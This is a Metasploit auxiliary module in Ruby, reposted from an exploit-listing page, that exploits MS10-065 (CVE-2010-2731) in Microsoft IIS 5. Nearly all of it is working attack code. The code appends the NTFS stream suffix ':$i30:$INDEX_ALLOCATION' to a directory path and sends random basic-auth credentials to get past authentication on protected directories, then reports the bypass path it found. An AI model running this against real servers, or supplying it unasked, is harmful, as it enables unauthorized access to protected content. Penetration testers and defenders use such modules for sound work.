Share
## https://sploitus.com/exploit?id=PACKETSTORM:180857
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',  
'Description' => %q{  
This module bypasses basic authentication for Internet Information Services (IIS).  
By appending the NTFS stream name to the directory name in a request, it is  
possible to bypass authentication.  
},  
'References' => [  
[ 'CVE', '2010-2731' ],  
[ 'OSVDB', '66160' ],  
[ 'MSB', 'MS10-065' ],  
[ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]  
],  
'Author' => [  
'Soroush Dalili',  
'sinn3r'  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2010-07-02'  
)  
)  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])  
]  
)  
end  
  
def has_auth  
uri = normalize_uri(target_uri.path)  
uri << '/' if uri[-1, 1] != '/'  
  
res = send_request_cgi({  
'uri' => uri,  
'method' => 'GET'  
})  
vprint_status(res.body) if res  
  
return (res and res.code == 401)  
end  
  
def try_auth  
uri = normalize_uri(target_uri.path)  
uri << '/' if uri[-1, 1] != '/'  
uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"  
  
dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'  
  
user = Rex::Text.rand_text_alpha(rand(5..14))  
pass = Rex::Text.rand_text_alpha(rand(5..14))  
  
vprint_status("Requesting: #{dir}")  
res = send_request_cgi({  
'uri' => dir,  
'method' => 'GET',  
'authorization' => basic_auth(user, pass)  
})  
vprint_status(res.body) if res  
  
return (res && (res.code != 401) && (res.code != 404)) ? dir : ''  
end  
  
def run  
if !has_auth  
print_error('No basic authentication enabled')  
return  
end  
  
bypass_string = try_auth  
  
if bypass_string.empty?  
print_error('The bypass attempt did not work')  
else  
print_good("You can bypass auth by doing: #{bypass_string}")  
end  
end  
end